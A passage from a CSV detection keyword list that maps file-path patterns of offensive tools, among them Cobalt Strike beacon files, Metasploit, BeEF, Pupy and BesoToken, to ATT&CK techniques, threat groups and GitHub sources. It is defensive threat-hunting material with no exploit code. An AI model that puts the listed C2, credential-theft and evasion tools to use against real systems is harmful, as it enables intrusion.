TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,1,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*/bacnet-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BadZure.git*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*/BadZure/*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*/banner.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BaseNEncoder.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/bash_completion.d/exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/bash_executor/*.go,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/bashexplode/boko*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*/Bashfuscator*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,1,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*/Bates.csproj*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/batik_svg*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bazarloader.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/bbaranoff/CVE-2022-0847/*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,1,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -*/beacon.h,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,1,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*/beacon_202_no_acl.log*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/beacon_257-objects.log*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/beacon_compatibility*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*/beacon_compatibility.*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*/beacon_funcs/*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/beacon_health_check/*,offensive_tool_keyword,cobaltstrike,This aggressor script uses a beacon's note field to indicate the health status of a beacon.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/beacon_health_check,1,1,N/A,10,10,138,25,2021-09-29T20:20:52Z,2021-07-08T13:28:11Z -*/beacon_http/*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/beacon_notify.cna*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/BeaconChannel.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/beaconhealth.cna*,offensive_tool_keyword,cobaltstrike,This aggressor script uses a beacon's note field to indicate the health status of a beacon.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/beacon_health_check,1,1,N/A,10,10,138,25,2021-09-29T20:20:52Z,2021-07-08T13:28:11Z -*/beacon-injection/*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*/beacon-object-file*,offensive_tool_keyword,cobaltstrike,Cobaltstrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/realoriginal/beacon-object-file,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/BeaconTool.java*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/beef.git*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beef/extensions/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beef_bind_shell/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beef_common.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beefbind/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/beefproject/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/Ben0xA/*,offensive_tool_keyword,Github Username,Github username of known powershell offensive modules and scripts,T1059 - T1027 - T1064 - T1086 - T1191 - T1202,TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Ben0xA,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BeRoot.git*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*/beRoot.py*,offensive_tool_keyword,BeRoot,Privilege Escalation Project - Windows / Linux / Mac ,T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007,TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*/beroot.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/BesoToken.cpp*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*/BesoToken.exe*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*/BesoToken.git*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,1,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*/bettercap*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/bhqc.py -*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD 